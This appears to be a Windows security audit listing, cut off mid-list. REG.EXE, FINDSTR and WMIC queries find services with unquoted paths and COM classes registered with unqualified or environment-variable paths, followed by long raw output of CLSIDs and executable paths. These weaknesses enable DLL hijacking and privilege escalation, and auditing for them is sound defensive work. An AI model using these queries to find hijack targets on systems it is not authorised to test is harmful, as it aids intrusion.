( REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /E /F "LocalServer" /K /S /VE REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /E /F "LocalServer32" /K /S /VE ) | FINDSTR.EXE /B /C:" (Default) REG_" 1>"%TMP%\Sloppy.tmp" FINDSTR.EXE /I /C:"_SZ %CommonProgram" "%TMP%\Sloppy.tmp" FINDSTR.EXE /I /C:"_SZ %Program" "%TMP%\Sloppy.tmp" FINDSTR.EXE /I /C:"_SZ %ProgramFiles%" "%TMP%\Sloppy.tmp"
Command lines of services with unquoted long
pathnames
containing a space:
WMIC.EXE /APPEND:"%USERPROFILE%\Desktop\Sloppy.log" Service WHERE "NOT PathName LIKE '%.%' OR NOT PathName LIKE '%\\%' OR PathName LIKE '%SystemDrive%\\Program %' OR PathName LIKE '%\\Windows %'" GET Name, PathName, StartName
Name PathName StartName Sense "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" LocalSystem WdNisSvc "C:\Program Files\Windows Defender\NisSrv.exe" NT AUTHORITY\LocalService WinDefend "C:\Program Files\Windows Defender\MsMpEng.exe" LocalSystem WMPNetworkSvc "C:\Program Files\Windows Media Player\wmpnetwk.exe" NT AUTHORITY\NetworkService
COM classes registered with an unqualified filename or a pathname containing an environment variable:
FOR %? IN (InProcHandler InProcHandler32 InProcServer InProcServer32 LocalServer LocalServer32 DefaultIcon ToolBoxBitmap32) DO @WMIC.EXE /APPEND:"%USERPROFILE%\Desktop\Sloppy.log" PATH Win32_ClassicCOMClassSetting WHERE "NOT %? LIKE '%.%' OR NOT %? LIKE '%\\%' OR %? LIKE '%[%]APPDATA[%]%' OR %? LIKE '%[%]CommonProgramFiles[%]%' OR %? LIKE '%[%]CommonProgramFiles(x86)[%]%' OR %? LIKE '%[%]LOCALAPPDATA[%]%' OR %? LIKE '%[%]LOGONSERVER[%]%' OR %? LIKE '%[%]ProgramData[%]%' OR %? LIKE '%[%]ProgramFiles[%]%' OR %? LIKE '%[%]ProgramFiles(x86)[%]%' OR %? LIKE '%[%]PUBLIC[%]%' OR %? LIKE '%[%]SystemDrive[%]%' OR %? LIKE '%[%]SystemRoot[%]%' OR %? LIKE '%[%]TEMP[%]%' OR %? LIKE '%[%]TMP[%]%' OR %? LIKE '%[%]USERPROFILE[%]%' OR %? LIKE '%[%]WINDIR[%]%'" GET ComponentId, ProgId, %?
No Instance(s) Available. ComponentId InprocHandler32 ProgId {0e119e63-267a-4030-8c80-5b1972e0a456} %SystemRoot%\system32\shcore.dll {1535D95C-2365-447D-9800-B75501A19C0C} %SystemRoot%\system32\ShareHost.dll {195C8ACD-5F96-4C67-BBCF-B0CD7073500C} %SystemRoot%\system32\ShareHost.dll {1cc78354-9ded-4c1b-bd81-c67b0289a4e5} %SystemRoot%\system32\windows.storage.dll {214DFBF5-5983-4B54-996D-B7FC67E0A1FD} %SystemRoot%\system32\Windows.Storage.dll {251b1498-5cba-4bee-8242-2f57773151aa} %SystemRoot%\system32\Windows.Storage.dll {320690f4-8d7b-4f55-a98d-89ebb01fa776} %SystemRoot%\system32\Windows.Storage.dll {36BAA497-8C84-4700-96A1-88E1876EC5B9} %SystemRoot%\system32\ShareHost.dll {3c5edebe-16c6-4ee4-906b-436aa1f6ef9e} %SystemRoot%\system32\twinapi.appcore.dll {4333fd20-ca5f-4095-a535-edb00455ce66} %SystemRoot%\system32\shcore.dll {4347F4C2-6A7D-40DF-9A4F-C185317AF183} %SystemRoot%\system32\ShareHost.dll {594103b8-e428-4461-b8d7-dd0ae12d31d9} %SystemRoot%\system32\Windows.Storage.dll {70BF9CA8-182C-4BE8-8BE8-1A9217A5D1B5} %SystemRoot%\system32\Windows.Storage.dll {73FDDC80-AEA9-101A-98A7-00AA00374959} ole32.dll WordPad.Document.1 {7513af53-9c75-4ad4-b47e-8d855099e023} %SystemRoot%\system32\shcore.dll {788B686B-EA20-41CD-A018-1BFD506194B2} %SystemRoot%\system32\ShareHost.dll {7bce3cfb-954c-438f-974c-73a8e0593f1a} %SystemRoot%\system32\shcore.dll {7e57f418-1f71-4411-9e09-45884f4f4714} %SystemRoot%\system32\shcore.dll {8FF007D1-C3E3-44D5-86AF-2ECB5F663D7C} %SystemRoot%\system32\Windows.Storage.dll {a5183349-82de-4bfc-9c13-7d9dc578729c} %SystemRoot%\system32\Windows.Storage.dll {B243A9FD-C57A-4D3E-A7CF-21CAED64CB5A} %systemroot%\system32\CoreUIComponents.dll {be88f957-42cc-4da7-92cf-9bc35c5d5ee2} %SystemRoot%\system32\Windows.Storage.dll {ccc63ae1-56a5-4f9c-abe8-e55674f0c0a6} %SystemRoot%\system32\Windows.Storage.dll {CF0E916A-DA25-49CA-A264-1D41C009EED0} %SystemRoot%\system32\ShareHost.dll {D3E34B21-9D75-101A-8C3D-00AA001A1652} ole32.dll Paint.Picture {da158800-7434-4410-a0cd-e497c3b4a9da} %SystemRoot%\system32\Windows.Storage.dll {da620430-5f6c-447d-8091-c5757e275b37} %SystemRoot%\system32\shcore.dll {f1f72421-6433-4de9-982d-c8dc12cb569c} %SystemRoot%\system32\shcore.dll {fd8d7f86-2f0c-43bb-b225-97ac3c04567b} %SystemRoot%\system32\shcore.dll ComponentId InprocServer ProgId {00020000-0000-0000-C000-000000000046} avifile.dll {00020001-0000-0000-C000-000000000046} avifile.dll {0002000D-0000-0000-C000-000000000046} avifile.dll {0002000F-0000-0000-C000-000000000046} avifile.dll ERROR: Description = Exception occured. ComponentId LocalServer32 ProgId {0002DF01-0000-0000-C000-000000000046} "%ProgramFiles%\Internet Explorer\iexplore.exe" InternetExplorer.Application.1 {0002DF02-0000-0000-C000-000000000046} %SystemRoot%\system32\browser_broker.exe BrowserBroker.BrowserBroker.1 {00f2b433-44e4-4d88-b2b0-2698a0a91dba} "%SystemRoot%\System32\rundll32.exe" "%ProgramFiles%\Windows Photo Viewer\PhotoAcq.dll",AutoplayComServerW {00f2b433-44e4-4d88-b2b0-2698a0a91dba} Microsoft.PhotoAcqHWEventHandler.1 {0289a7c5-91bf-4547-81ae-fec91a89dec5} %systemroot%\system32\WinrsHost.exe {031EE060-67BC-460d-8847-E4A7C5E45A27} "%ProgramFiles%\Windows Media Player\wmprph.exe" {03837511-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.TraceDataProviderCollection.1 {03837513-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.TraceDataProvider.1 {0383751C-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.TraceSession.1 {03837521-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.DataCollectorSet.1 {03837525-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.DataCollectorSetCollection.1 {03837526-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.LegacyDataCollectorSet.1 {03837527-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.LegacyDataCollectorSetCollection.1 {03837528-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.LegacyTraceSession.1 {03837529-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.LegacyTraceSessionCollection.1 {03837530-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.TraceSessionCollection.1 {03837531-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.ServerDataCollectorSet.1 {03837532-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.ServerDataCollectorSetCollection.1 {03837538-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.BootTraceSession.1 {03837539-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.BootTraceSessionCollection.1 {03837546-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.SystemDataCollectorSet.1 {03837547-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.SystemDataCollectorSetCollection.1 {046AEAD9-5A27-4D3C-8A67-F82552E0A91B} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {046AEAD9-5A27-4D3C-8A67-F82552E0A91B} {047ea9a0-93bb-415f-a1c3-d7aeb3dd5087} %SystemRoot%\System32\fsquirt.exe {054AAE20-4BEA-4347-8A35-64A533254A9D} "%CommonProgramFiles%\microsoft shared\ink\TabTip.exe" {0823B6F8-F499-4d5e-B885-EA9CB4F43B24} %SystemRoot%\winsxs\x86_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.411_none_03353754a072182b\TiWorker.exe {08FC06E4-C6B5-40BE-97B0-B80F943C615B} %SystemRoot%\System32\ProximityUxHost.exe {115e13cf-cfe8-4821-b0da-e06aa4d51426} %SystemRoot%\system32\RdpSaProxy.exe {1202DB60-1DAC-42C5-AED5-1ABDD432248E} %SystemRoot%\System32\mobsync.exe {152EA2A8-70DC-4C59-8B2A-32AA3CA0DCAC} "%SystemRoot%\System32\RmtTpmVscMgrSvr.exe" {16A18E86-7F6E-4C20-AD89-4FFC0DB7A96A} "%SystemRoot%\System32\TpmVscMgrSvr.exe" {19833350-BF9B-42A1-BDF0-BD1FCBE1FD31} "%SystemRoot%\System32\ImmersiveTpmVscMgrSvr.exe" {19C65143-6230-42FA-A58E-7D9FA9BE2EB5} %SystemRoot%\system32\wkspbroker.exe WorkspaceBroker.WorkspaceBroker.1 {1A1F4206-0688-4E7F-BE03-D82EC69DF9A5} %SystemRoot%\System32\mobsync.exe {1C749B87-568C-4865-8E73-6413F8372CE6} "%systemroot%\system32\lpksetup.exe" {1F87137D-0E7C-44d5-8C73-4EFFB68962F2} %systemroot%\system32\wbem\wmiprvse.exe -secured {24AC8F2B-4D4A-4C17-9607-6A4B14068F97} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {24AC8F2B-4D4A-4C17-9607-6A4B14068F97} {25B25D91-69A2-47fa-A375-FDC98189A06F} %systemroot%\system32\SyncHost.exe {266C72E7-62E8-11D1-AD89-00C04FD8FDFF} %SystemRoot%\system32\wbem\scrcons.exe {2744BC6A-4039-11E3-ABAD-8CFB6188709B} %SystemRoot%\system32\SettingSyncHost.exe {2B32ECC3-C3BB-4701-82BB-EB7FE370D999} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {2B32ECC3-C3BB-4701-82BB-EB7FE370D999} {2F93C02D-77F9-46B4-95FB-8CBB81EEB62C} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {2F93C02D-77F9-46B4-95FB-8CBB81EEB62C} {32BA16FD-77D9-4AFB-9C9F-703E92AD4BFF} %SystemRoot%\System32\cttunesvr.exe cttunesvr.CtTuner.1 {3C296D07-90AE-4FAC-86F9-65EAA8B82D22} %SystemRoot%\system32\SppExtComObj.exe {3eef301f-b596-4c0b-bd92-013beafce793} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} {4545dea0-2dfc-4906-a728-6d986ba399a9} %SystemRoot%\System32\ThumbnailExtractionHost.exe {45597c98-80f6-4549-84ff-752cf55e2d29} "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Enqueue {494C063B-1024-4DD1-89D3-713784E82044} %systemroot%\system32\spool\tools\PrintBrmEngine.exe {49B2791A-B1AE-4C90-9B8E-E860BA07F889} %SystemRoot%\system32\mmc.exe MMC20.Application.1 {49BD2028-1523-11D1-AD79-00C04FD8FDFF} %SystemRoot%\system32\wbem\unsecapp.exe {4AA0A5C4-1B9B-4F2E-99D7-99C6AEC83474} %SystemRoot%\system32\SettingSyncHost.exe {4F1DFCA6-3AAD-48E1-8406-4BC21A501D7C} %SystemRoot%\system32\wksprt.exe WorkspaceRuntime.Workspace.1 {515980c3-57fe-4c1e-a561-730dd256ab98} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {515980c3-57fe-4c1e-a561-730dd256ab98} {549e57e9-b362-49d1-b679-b64d510efe4b} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {549e57e9-b362-49d1-b679-b64d510efe4b} {6295DF2D-35EE-11D1-8707-00C04FD93327} %SystemRoot%\System32\mobsync.exe {62AD5CB4-F168-4B95-8AAE-6F47A75D5D30} %SystemRoot%\system32\oobe\UserOOBEBroker.exe {682159d9-c321-47ca-b3f1-30e36b2ec8b9} %SystemRoot%\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} {69F9CB25-25E2-4BE1-AB8F-07AA7CB535E8} %SystemRoot%\System32\mobsync.exe {6d8ff8e0-730d-11d4-bf42-00b0d0118b56} %SystemRoot%\system32\upnpcont.exe {6d8ff8e8-730d-11d4-bf42-00b0d0118b56} %SystemRoot%\system32\upnpcont.exe {722b3793-5367-4446-b6bb-db89b05c1f24} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {722b3793-5367-4446-b6bb-db89b05c1f24} {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} %systemroot%\system32\wbem\wmiprvse.exe {73FDDC80-AEA9-101A-98A7-00AA00374959} "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" WordPad.Document.1 {75dff2b7-6936-4c06-a8bb-676a7b00b24b} %SystemRoot%\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} {8086ebd4-43e3-4b19-beb3-f0ea4ecf319c} %SystemRoot%\System32\sdiagnhost.exe {884e2049-217d-11da-b2a4-000e7bbb2b09} %systemroot%\system32\CertEnrollCtrl.exe X509Enrollment.CX509EnrollmentWebClassFactory.1 {884e2050-217d-11da-b2a4-000e7bbb2b09} %systemroot%\system32\CertEnrollCtrl.exe X509Enrollment.CX509EnrollmentHelper.1 {8b455e45-7cc8-4253-af5b-b2cd3313e9cc} %SystemRoot%\system32\SettingSyncHost.exe {8D8B8E30-C451-421B-8553-D2976AFA648C} %SystemRoot%\System32\mobsync.exe {94E03510-31B9-47a0-A44E-E932AC86BB17} "%ProgramFiles%\Windows Media Player\wmlaunch.exe" WMP.Device.1 {9678f47f-2435-475c-b24a-4606f8161c16} %systemroot%\system32\wsmprovhost.exe {98068995-54d2-4136-9bc9-6dbcb0a4683f} %systemroot%\system32\WinrsHost.exe {98BB952B-B23E-4737-8ABD-B553E7484B38} %SystemRoot%\system32\DeviceEnroller.exe {995C996E-D918-4a8c-A302-45719A6F4EA7} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} {9a97f12a-6b73-4dc4-b3c1-e9244c03adac} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {9a97f12a-6b73-4dc4-b3c1-e9244c03adac} {9aa46009-3ce0-458a-a354-715610a075e6} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} {9acf41ed-d457-4cc1-941b-ab02c26e4686} %systemroot%\system32\wsmprovhost.exe {9BA05972-F6A8-11CF-A442-00A0C90A8F39} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} {9C38ED61-D565-4728-AEEE-C80952F0ECDE} %SystemRoot%\System32\vdsldr.exe {A19141CE-D197-4C8B-82C9-4995F5303497} %SystemRoot%\System32\DisplaySwitch.exe {A55803CC-4D53-404c-8557-FD63DBA95D24} %SystemRoot%\system32\WPDShextAutoplay.exe {a677570a-2ba2-4e9a-b2e2-8a02cd8b4fd3} %SystemRoot%\system32\PrintIsolationHost.exe PrintSys.CoPrintIsolationHost.1 {aac1009f-ab33-48f9-9a21-7f5b88426a2e} %SystemRoot%\system32\TSTheme.exe {AB93B6F1-BE76-4185-A488-A9001B105B94} %SystemRoot%\System32\BdeUISrv.exe BdeUISrv.BDEUILauncher.1 {B43A0C1E-B63F-4691-B68F-CD807A45DA01} %SystemRoot%\system32\TSWbPrxy.exe MSTSWebProxy.MSTSWebProxy.1 {B8558612-DF5E-4F95-BB81-8E910B327FB2} %SystemRoot%\System32\mobsync.exe {b8f87e75-d1d5-446b-931c-3f61b97bca7a} %systemroot%\system32\DXPServer.exe {B9B05098-3E30-483F-87F7-027CA78DA287} %SystemRoot%\system32\ApplicationFrameHost.exe {BA441419-0B3F-4FB6-A903-D16CC14CCA44} %SystemRoot%\system32\PickerHost.exe {BF8841C9-378A-4CAD-B4FC-5091366CBC0D} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {BF8841C9-378A-4CAD-B4FC-5091366CBC0D} {c08afd90-f2a1-11d1-8455-00a0c91f3880} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} {C6B167EA-DB3E-4659-BADC-D1CCC00EFE9C} %SystemRoot%\System32\FodHelper.exe FodHelper.FodHelperObj.1 {c82192ee-6cb5-4bc0-9ef0-fb818773790a} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} {C947D50F-378E-4FF6-8835-FCB50305244D} %SystemRoot%\system32\mobsync.exe {CC6D9715-F553-4299-B2CE-6C7851FAA03A} %SystemRoot%\system32\browser_broker.exe {cdc32574-7521-4124-90c3-8d5605a34933} "%ProgramFiles%\Windows Media Player\wmplayer.exe" /BurnCD {ceff45ee-c862-41de-aee2-a022c81eda92} %SystemRoot%\explorer.exe /factory,{ceff45ee-c862-41de-aee2-a022c81eda92} {D3E34B21-9D75-101A-8C3D-00AA001A1652} %systemroot%\system32\mspaint.exe Paint.Picture {d54378cd-91d8-4e10-a00b-819f9a9efcb1} %systemroot%\system32\printfilterpipelinesvc.exe PrintSys.CoFilterPipeline.1 {D5E8041D-920F-45e9-B8FB-B1DEB82C6E5E} "%ProgramFiles%\Internet Explorer\iexplore.exe" -startmediumtab {DF4FCC34-067A-4E0A-8352-4A1A5095346E} "%ProgramFiles%\Internet Explorer\iexplore.exe" -startmanager {e3a4e5ca-55b2-4a06-b1ab-8fbecc7bca4b} %SystemRoot%\system32\rundll32.exe /sta {fcc2867c-69ea-4d85-8058-7c214e611c97} {e44e9428-bdbc-4987-a099-40dc8fd255e7} %SystemRoot%\system32\OpenWith.exe {E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C} %SystemRoot%\splwow64.exe {ed1d0fdf-4414-470a-a56d-cfb68623fc58} "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Play {F0A3A195-8D6A-4BC7-BD1F-3B2A2D5807CA} %SystemRoot%\system32\SettingSyncHost.exe {F1EFACAA-08A1-461B-9D28-7AA8947889A0} %systemroot%\system32\SyncHost.exe {F2506CD7-82C2-43D9-A1D3-F85F5EFE7D09} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {F2506CD7-82C2-43D9-A1D3-F85F5EFE7D09} {F827EC16-664E-4B05-878C-02D242229094} %SystemRoot%\system32\CloudNotifications.exe {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} %SystemRoot%\System32\slui.exe SPPUI.SPPUIObjectInteractive.1 {fb479c02-9ec4-4fed-8599-debe037452cb} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {fb479c02-9ec4-4fed-8599-debe037452cb} {FDA74D11-C4A6-4577-9F73-D7CA8586E10C} %SystemRoot%\System32\ProximityUxHost.exe {FFB8655F-81B9-4fce-B89C-9A6BA76D13E7} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {FFB8655F-81B9-4fce-B89C-9A6BA76D13E7} Shell.HWEventHandlerShellExecute.1 ComponentId DefaultIcon ProgId {025A5937-A6BE-4686-A844-36FE4BEC8B6D} %SystemRoot%\System32\powercpl.dll,-1 {031E4825-7B94-4dc3-B131-E946B44C8DD5} %SystemRoot%\system32\imageres.dll,-1023 {04731B67-D933-450a-90E6-4ACD2E9408FE} %SystemRoot%\system32\Windows.Storage.Search.dll,-323 {047ea9a0-93bb-415f-a1c3-d7aeb3dd5087} %SystemRoot%\System32\fsquirt.exe,-107 {05d7b0f4-2121-4eff-bf6b-ed3f69b894d9} %SystemRoot%\System32\taskbarcpl.dll,-1 {088e3905-0323-4b02-9826-5d99428e115f} %SystemRoot%\system32\imageres.dll,-184 {0C39A5CF-1A7A-40C8-BA74-8900E6DF5FCD} %SystemRoot%\system32\imageres.dll,-117 {0DB7E03F-FC29-4DC6-9020-FF41B59E513A} %SystemRoot%\system32\imageres.dll,-198 {0DF44EAA-FF21-4412-828E-260A8728E7F1} %SystemRoot%\system32\imageres.dll,-80 {0F563B5F-8EE2-4516-BA0A-544DE058C75B} %SystemRoot%\System32\FileHistory.exe,-100 {1206F5F1-0569-412C-8FEC-3204630DFB70} %SystemRoot%\system32\Vault.dll,-1 {148BD520-A2AB-11CE-B11F-00AA00530503} %systemroot%\System32\mstask.dll,-101 {148BD52A-A2AB-11CE-B11F-00AA00530503} %systemroot%\System32\mstask.dll,0 {15eae92e-f17a-4431-9f28-805e482dafd4} %SystemRoot%\system32\imageres.dll,-87 {17cd9488-1228-4b2f-88ce-4298e93e0966} %SystemRoot%\System32\imageres.dll,-24 {1CF1260C-4DD0-4ebb-811F-33C572699FDE} %SystemRoot%\system32\imageres.dll,-108 {1FA9085F-25A2-489B-85D4-86326EEDCD87} %SystemRoot%\System32\wlanpref.dll {208D2C60-3AEA-1069-A2D7-08002B30309D} %SystemRoot%\system32\imageres.dll,-25 {20D04FE0-3AEA-1069-A2D8-08002B30309D} %SystemRoot%\System32\imageres.dll,-109 {21EC2020-3AEA-1069-A2DD-08002B30309D} %SystemRoot%\System32\imageres.dll,-27 {2227A280-3AEA-1069-A2DE-08002B30309D} %SystemRoot%\System32\imageres.dll,-26 {22877a6d-37a1-461a-91b0-dbda5aaebc99} %SystemRoot%\system32\imageres.dll,-117 {24ad3ad4-a569-4530-98e1-ab02f9417aa8} %SystemRoot%\system32\imageres.dll,-113 {2559a1f0-21d7-11d4-bdaf-00c04f60b9f0} %SystemRoot%\System32\imageres.dll,-177 {2559a1f2-21d7-11d4-bdaf-00c04f60b9f0} %SystemRoot%\System32\shell32.dll,-48 {2559a1f3-21d7-11d4-bdaf-00c04f60b9f0} %SystemRoot%\System32\imageres.dll,-100 {2559a1f5-21d7-11d4-bdaf-00c04f60b9f0} %SystemRoot%\explorer.exe,-254 {2559a1f7-21d7-11d4-bdaf-00c04f60b9f0} %SystemRoot%\System32\imageres.dll,-24 {26EE0668-A00A-44D7-9371-BEB064C98683} %SystemRoot%\System32\imageres.dll,-27 {28803F59-3A75-4058-995F-4EE5503B023C} %systemroot%\system32\DevicePairingFolder.dll,-200 {289AF617-1CC3-42A6-926C-E6A863F0E3BA} dlnashext.dll,-200 {2E17C0EF-2851-459b-A3C8-27A41D4BC9F7} %SystemRoot%\system32\themeui.dll,7 Theme.Manager.1 {2F6CE85C-F9EE-43CA-90C7-8A9BD53A2467} FileHistory.exe,0 {3080F90D-D7AD-11D9-BD98-0000947B0257} %SystemRoot%\explorer.exe,-103 {3080F90E-D7AD-11D9-BD98-0000947B0257} %SystemRoot%\explorer.exe,-258 {3134ef9c-6b18-4996-ad04-ed5912e00eb5} %SystemRoot%\system32\imageres.dll,-117 {323CA680-C24D-4099-B94D-446DD2D7249E} %SystemRoot%\system32\imageres.dll,-1024 {328B0346-7EAF-4BBE-A479-7CB88A095F5B} %SystemRoot%\system32\imageres.dll,-27 LayoutFolder {374DE290-123F-4565-9164-39C4925E467B} %SystemRoot%\system32\imageres.dll,-184 {38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B} %SystemRoot%\system32\imageres.dll,-171 {3936E9E4-D92C-4EEE-A85A-BC16D5EA0819} %SystemRoot%\system32\shell32.dll,-37219 {3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA} %SystemRoot%\system32\imageres.dll,-113 {3dfdf296-dbec-4fb4-81d1-6a3438bcf4de} %SystemRoot%\system32\imageres.dll,-108 {3f6bc534-dfa1-4ab4-ae54-ef25a74e0107} %SystemRoot%\System32\rstrui.exe,0 {40419485-C444-4567-851A-2DD7BFA1684D} %SystemRoot%\System32\telephon.cpl,-100 {430da762-8632-4840-bc61-3eeaa078e62e} %SystemRoot%\system32\display.dll,1 {450D8FBA-AD25-11D0-98A8-0800361B1103} %SystemRoot%\system32\shell32.dll,-235 {48123BC4-99D9-11D1-A6B3-00C04FD91555} %SystemRoot%\System32\msxml3.dll,0 xmlfile {4c892621-6757-4fe0-ad8c-a6301be7fba2} %SystemRoot%\system32\themeui.dll,7 {5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0} %SystemRoot%\system32\imageres.dll,-27 {58E3C745-D971-4081-9034-86E34B30836A} %SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll,-1 {59031a47-3f72-44a7-89c5-5595fe6b30ee} %SystemRoot%\system32\imageres.dll,-123 {5ea4f148-308c-46d7-98a9-49041b1dd468} %SystemRoot%\system32\mblctr.exe,0 {5ED4F38C-D3FF-4D61-B506-6820320AEBFE} %SystemRoot%\System32\imageres.dll,-27 {5ef4af3a-f726-11d0-b8a2-00c04fc309a4} %SystemRoot%\system32\shell32.dll,-33 {60632754-c523-4b62-b45c-4172da012619} %SystemRoot%\System32\usercpl.dll,-1 {60F6E464-4DEF-11d2-B2D9-00C04F8EEC8C} %SystemRoot%\System32\DATACLEN.DLL,-2002 {62D8ED13-C9D0-4CE8-A914-47DD628FB1B0} %SystemRoot%\System32\intl.cpl,-200 {6377013E-2C35-40F3-B8E1-1AB47D12982B} %SystemRoot%\system32\WABSyncProvider.dll,0 {63da6ec0-2e98-11cf-8d82-444553540000} %SystemRoot%\system32\imageres.dll,-73 {645FF040-5081-101B-9F08-00AA002F954E} %SystemRoot%\System32\imageres.dll,-55 {67718415-c450-4f3c-bf8a-b487642dc39b} %SystemRoot%\system32\imageres.dll,-87 {679f85cb-0220-4080-b29b-5540cc05aab6} %SystemRoot%\system32\shell32.dll,-51380 {67CA7650-96E6-4FDD-BB43-A8E774F73A57} %SystemRoot%\System32\imageres.dll,-1013 {6C8EEC18-8D75-41B2-A177-8831D59D2D50} %SystemRoot%\System32\main.cpl,-100 {6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} %SystemRoot%\system32\imageres.dll,-166 {7007ACC7-3202-11D1-AAD2-00805FC1270E} %SystemRoot%\system32\netshell.dll {725BE8F7-668E-4C7B-8F90-46BDB0936430} %SystemRoot%\System32\main.cpl,-200 {73FDDC80-AEA9-101A-98A7-00AA00374959} "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE",1 WordPad.Document.1 {74246bfc-4c96-11d0-abef-0020af6b0b7a} %SystemRoot%\system32\devmgr.dll,-201 {7A9D77BD-5403-11d2-8785-2E0420524153} %SystemRoot%\system32\netplwiz.dll,-102 {7b81be6a-ce2b-4676-a29e-eb907a5126c5} %SystemRoot%\system32\imageres.dll,-87 {80F3F1D5-FECA-45F3-BC32-752C152E456E} %SystemRoot%\System32\tabletpc.cpl,-10200 {863aa9fd-42df-457b-8e4d-0de1b8015c60} %SystemRoot%\System32\imageres.dll,-26 {87D66A43-7B11-4A28-9811-C86EE395ACF7} %SystemRoot%\System32\srchadmin.dll,-201 {888DCA60-FC0A-11CF-8F0F-00C04FD7D062} %SystemRoot%\system32\zipfldr.dll {89D83576-6BD1-4c86-9454-BEB04E94C819} %systemroot%\system32\mssvp.dll,-504 {8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77} %SystemRoot%\System32\pwcreator.exe,-2001 {8E908FC9-BECC-40f6-915B-F4CA0E70D03D} %SystemRoot%\System32\netcenter.dll,-1 {8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA} %systemroot%\system32\dxp.dll,0 {9324DA94-50EC-4A14-A770-E90CA03E7C8F} %SystemRoot%\system32\themeui.dll,7 {93412589-74D4-4E4E-AD0E-E0CB621440FD} %SystemRoot%\System32\fontext.dll {9343812e-1c37-4a49-a12e-4b2d810d956b} %SystemRoot%\System32\searchfolder.dll,-323 {98F275B4-4FFF-11E0-89E2-7B86DFD72085} %SystemRoot%\system32\SearchFolder.dll,-323 {992CFFA0-F557-101A-88EC-00DD010CCC48} %SystemRoot%\system32\netshell.dll {9C60DE1E-E5FC-40f4-A487-460851A8D915} %SystemRoot%\System32\autoplay.dll,-1 {9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF} %SystemRoot%\System32\SyncCenter.dll,-1000 {9DB7A13C-F208-4981-8353-73CC61AE2783} %SystemRoot%\system32\twext.dll,-100 Previous.Versions {9E56BE60-C50F-11CF-9A2C-00A0C90A90CE} %SystemRoot%\system32\sendmail.dll,-2001 {9E56BE61-C50F-11CF-9A2C-00A0C90A90CE} %SystemRoot%\system32\imageres.dll,-110 {9FE63AFD-59CF-4419-9775-ABCC3849F861} %SystemRoot%\System32\imageres.dll,-1022 {a00ee528-ebd9-48b8-944a-8942113d46ac} %SystemRoot%\system32\SearchFolder.dll,-323 {A0953C92-50DC-43bf-BE83-3742FED03C9C} %SystemRoot%\system32\imageres.dll,-189 {A8A91A66-3A7D-4424-8D24-04E180695C7A} %systemroot%\system32\DeviceCenter.dll,-1 {A8CDFF1C-4878-43be-B5FD-F8091C1C60D0} 